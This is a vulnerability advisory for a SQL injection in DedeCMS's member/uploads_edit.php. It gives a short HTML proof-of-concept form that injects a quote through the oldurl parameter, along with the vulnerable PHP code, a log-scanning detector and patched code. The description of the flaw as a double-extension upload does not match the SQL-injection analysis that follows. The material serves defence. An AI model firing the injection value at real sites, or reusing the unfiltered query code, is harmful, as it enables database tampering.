dedecms/member/uploads_edit.php SQL Injection Vul

Source: Internet
Author: User
Tags: sql injection, cve

Catalog

1. Vulnerability Description
2. Vulnerability Trigger Condition
3. Vulnerability Impact Range
4. Vulnerability Code Analysis
5. Defense Methods
6. Defensive Thinking

1. Vulnerability description

An unrestricted file upload vulnerability in member/uploads_edit.php in DedeCMS 5.3 allows a remote attacker to execute arbitrary code by uploading a file with two extensions and then accessing that file via an unknown vector. This has been confirmed with a filename ending in .jpg.php.

Relevant Link:

http://cve.scap.org.cn/cve-2009-2270.html
http://www.cnnvd.org.cn/vulnerability/show/cv_id/2009070008


2. Vulnerability Trigger Condition

0x1: PoC

<form id="frmupload" enctype="multipart/form-data"
      action="http://127.0.0.1/dedecms5.5/member/uploads_edit.php?dopost=save&title=ss&oldurl=1'.php"
      method="post">
  <!-- oldurl is the injection point -->
  <input type="file" name="addonfile" id="addonfile" size=" -"><br>
  <input name="mode" type="hidden" value="2">
  <input id="btnupload" type="submit" value="Upload">
</form>
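The request above is easy to spot in web-server logs. The following script is an added example (it is not part of the original post or of DedeCMS) that scans constructed Apache combined-format log lines for POSTs to uploads_edit.php with dopost=save whose oldurl value carries a quote, a backslash, a second extension, or an executable extension. The log lines, IP addresses and the function name findSuspiciousUploadEdits are this example's own inventions.

```php
<?php
declare(strict_types=1);

// Constructed sample log (Apache combined format). Line 2 mirrors the PoC
// request from the post (oldurl=1'.php, URL-encoded); line 3 is a normal edit;
// line 4 carries a double extension. None of this is real traffic.
$sampleLog = <<<'LOG'
203.0.113.5 - - [10/Jan/2011:10:01:02 +0800] "GET /dedecms5.5/member/uploads_edit.php?aid=12 HTTP/1.1" 200 812 "-" "Mozilla/5.0"
203.0.113.5 - - [10/Jan/2011:10:01:40 +0800] "POST /dedecms5.5/member/uploads_edit.php?dopost=save&title=ss&oldurl=1%27.php HTTP/1.1" 200 233 "-" "Mozilla/5.0"
198.51.100.7 - - [10/Jan/2011:10:02:15 +0800] "POST /dedecms5.5/member/uploads_edit.php?dopost=save&title=pic&oldurl=uploads/userup/1/pic.jpg HTTP/1.1" 200 233 "-" "Mozilla/5.0"
198.51.100.9 - - [10/Jan/2011:10:03:00 +0800] "POST /dedecms5.5/member/uploads_edit.php?dopost=save&title=x&oldurl=a.jpg.php HTTP/1.1" 200 233 "-" "Mozilla/5.0"
LOG;

/**
 * Return every request line that reaches the vulnerable save branch with a
 * suspicious oldurl, together with the reasons it was flagged.
 * (Hypothetical helper written for this example.)
 */
function findSuspiciousUploadEdits(string $log): array
{
    $hits = [];
    foreach (preg_split('/\R/', trim($log)) as $line) {
        // Pull method, path and query string out of the quoted request field.
        if (!preg_match('#"(\w+) ([^ ?"]*uploads_edit\.php)\?([^ "]*) HTTP/#', $line, $m)) {
            continue;
        }
        parse_str($m[3], $q);               // decodes %27 back to a quote
        if (($q['dopost'] ?? '') !== 'save' || !is_string($q['oldurl'] ?? null)) {
            continue;                        // not the save branch, or no oldurl
        }
        $oldurl  = $q['oldurl'];
        $reasons = [];
        if (preg_match('/[\'"\\\\]/', $oldurl)) {
            $reasons[] = 'quote or backslash in oldurl';
        }
        if (preg_match('/\.[A-Za-z0-9]+\.[A-Za-z0-9]+$/', $oldurl)) {
            $reasons[] = 'double extension in oldurl';
        }
        if (preg_match('/\.php\d?$/i', $oldurl)) {
            $reasons[] = 'executable extension in oldurl';
        }
        if ($reasons !== []) {
            $hits[] = ['line' => $line, 'oldurl' => $oldurl, 'reasons' => $reasons];
        }
    }
    return $hits;
}

foreach (findSuspiciousUploadEdits($sampleLog) as $hit) {
    echo $hit['oldurl'], ' -> ', implode('; ', $hit['reasons']), PHP_EOL;
}
```

Run with the PHP CLI. Only the second and fourth sample lines are reported; the GET and the ordinary pic.jpg edit pass through. The query string is decoded with parse_str before matching so that URL-encoded quotes are not missed; a rule that only looks for a literal apostrophe in the raw line would overlook the %27 form used in the sample.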

Relevant Link:

http://www.wooyun.org/bug.php?action=view&id=48894
http://www.2cto.com/Article/201012/80026.html


3. Vulnerability Impact Range
4. Vulnerability Code Analysis

/member/uploads_edit.php

else if($dopost=='save')
{
    $title = HtmlReplace($title, 2);
    if($mediatype==1) $utype = 'image';
    else if($mediatype==2) { $utype = 'flash'; }
    else if($mediatype==3) { $utype = 'media'; }
    else { $utype = 'addon'; }
    $title = HtmlReplace($title, 2);
    // strip the directory part of $oldurl, leaving the file name
    $exname = ereg_replace("(.*)/", "", $oldurl);
    // strip the extension, leaving the base name before the "."
    $exname = ereg_replace("\.(.*)$", "", $exname);
    // returns the name of the uploaded file; $oldurl has not been filtered at this point
    $filename = MemberUploads('addonfile', $oldurl, $cfg_ml->M_ID, $utype, $exname, -1, -1, true);
    // $filename is passed on to the function that builds the SQL query
    SaveUploadInfo($title, $filename, $mediatype);
    ShowMsg("successfully modified the file!", "uploads_edit.php?aid=$aid");
}

\member\inc\inc_archives_functions.php

function SaveUploadInfo($title, $filename, $medaitype=1, $addinfos='')
{
    global $dsql, $cfg_ml, $cfg_basedir;
    if($filename=='')
    {
        return false;
    }
    if(!is_array($addinfos))
    {
        $addinfos[0] = $addinfos[1] = $addinfos[2] = 0;
    }
    if($medaitype==1)
    {
        $info = '';
        $addinfos = getimagesize($cfg_basedir.$filename, $info);
    }
    $addinfos[2] = @filesize($cfg_basedir.$filename);
    // $filename (derived from the unfiltered $oldurl) is interpolated into this lookup as well
    $row = $dsql->GetOne("SELECT aid,title,url FROM `#@__uploads` WHERE url LIKE '$filename' AND mid='".$cfg_ml->M_ID."';");
    $uptime = time();
    if(is_array($row))
    {
        $query = "UPDATE `#@__uploads` SET title='$title', mediatype='$medaitype', width='{$addinfos[0]}', height='{$addinfos[1]}', filesize='{$addinfos[2]}', uptime='$uptime'
                  WHERE aid='{$row['aid']}';";
        $dsql->ExecuteNoneQuery($query);
    }
    else
    {
        // SQL injection: $filename is placed in the INSERT statement without any filtering
        $inquery = "INSERT INTO `#@__uploads`(title,url,mediatype,width,height,playtime,filesize,uptime,mid)
                    VALUES ('$title','$filename','$medaitype','".$addinfos[0]."','".$addinfos[1]."','0','".$addinfos[2]."','$uptime','".$cfg_ml->M_ID."');";
        $dsql->ExecuteNoneQuery($inquery);
    }
    return true;
}


5. Defense Methods

/member/uploads_edit.php

else if($dopost=='save')
{
    $title = HtmlReplace($title, 2);
    if($mediatype==1) $utype = 'image';
    else if($mediatype==2) { $utype = 'flash'; }
    else if($mediatype==3) { $utype = 'media'; }
    else { $utype = 'addon'; }
    $title = HtmlReplace($title, 2);
    /* filter $oldurl before it is used anywhere */
    $oldurl = HtmlReplace($oldurl);
    $exname = preg_replace("#(.*)/#", "", $oldurl);
    $exname = preg_replace("#\.(.*)$#", "", $exname);
    $filename = MemberUploads('addonfile', $oldurl, $cfg_ml->M_ID, $utype, $exname, -1, -1, TRUE);
    SaveUploadInfo($title, $filename, $mediatype);
    ShowMsg("successfully modified the file!", "uploads_edit.php?aid=$aid");
}
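The patch above escapes $oldurl at its entry point, which removes the quote that reaches the query. A more robust shape is to do both things the analysis in section 4 calls for: reject any file name that is not a plain relative path with a single allow-listed extension, and pass the name to the database as a bound parameter so that the query text can never be altered by its content. The code below is an added example written for this page; it is not DedeCMS code. The function names validateUploadName and saveUploadInfo, the column subset, the extension list and the in-memory SQLite database are all this example's own assumptions, and `#@__uploads` is kept only as the table-prefix placeholder that appears on the page.

```php
<?php
declare(strict_types=1);

/**
 * Accept only a relative path built from letters, digits, '_', '-' and '/'
 * with exactly one extension (this alone rules out quotes, backslashes,
 * NUL bytes, absolute paths and ".." segments). Returns the name when it
 * passes and the extension is allow-listed, null otherwise.
 * (Hypothetical helper written for this example.)
 */
function validateUploadName(string $oldurl, array $allowedExt): ?string
{
    if (!preg_match('#^[A-Za-z0-9_\-]+(?:/[A-Za-z0-9_\-]+)*\.([A-Za-z0-9]+)$#', $oldurl, $m)) {
        return null;
    }
    return in_array(strtolower($m[1]), $allowedExt, true) ? $oldurl : null;
}

/**
 * Record the upload with a prepared statement. The file name travels as a
 * bound value, so a quote inside it is data, never part of the SQL text.
 * (Hypothetical replacement for the page's SaveUploadInfo; subset of columns.)
 */
function saveUploadInfo(PDO $db, string $title, string $filename, int $mediatype, int $mid): bool
{
    $allowed  = ['jpg', 'jpeg', 'gif', 'png', 'swf', 'mp4', 'zip'];   // assumed allow-list
    $safeName = validateUploadName($filename, $allowed);
    if ($safeName === null) {
        return false;                       // reject before touching the database
    }
    $stmt = $db->prepare(
        'INSERT INTO `#@__uploads` (title, url, mediatype, uptime, mid) ' .
        'VALUES (:title, :url, :mediatype, :uptime, :mid)'
    );
    return $stmt->execute([
        ':title'     => $title,
        ':url'       => $safeName,
        ':mediatype' => $mediatype,
        ':uptime'    => time(),
        ':mid'       => $mid,
    ]);
}

// Stand-alone check against an in-memory SQLite database (constructed data,
// requires the pdo_sqlite extension).
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE `#@__uploads` (aid INTEGER PRIMARY KEY, title TEXT, url TEXT, mediatype INTEGER, uptime INTEGER, mid INTEGER)');

var_dump(saveUploadInfo($db, 'photo', 'uploads/userup/1/photo.jpg', 1, 1));  // ordinary name: stored
var_dump(saveUploadInfo($db, 'photo', "1'.php", 1, 1));                     // the PoC value: rejected
var_dump(saveUploadInfo($db, 'photo', 'a.jpg.php', 1, 1));                  // double extension: rejected
var_dump((int) $db->query('SELECT COUNT(*) FROM `#@__uploads`')->fetchColumn());  // one row
```

The allow-list regex does the work that HtmlReplace only approximates: it rejects the whole request rather than transforming the bad characters, so the double-extension case from section 1 and the quote case from section 2 are both stopped by the same check. Binding the value with PDO is what protects the SQL statement; the validation is there for the file-system side, since the name is also used to build a path under $cfg_basedir.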


6. Defensive Thinking

Copyright (c) Littlehann All rights reserved
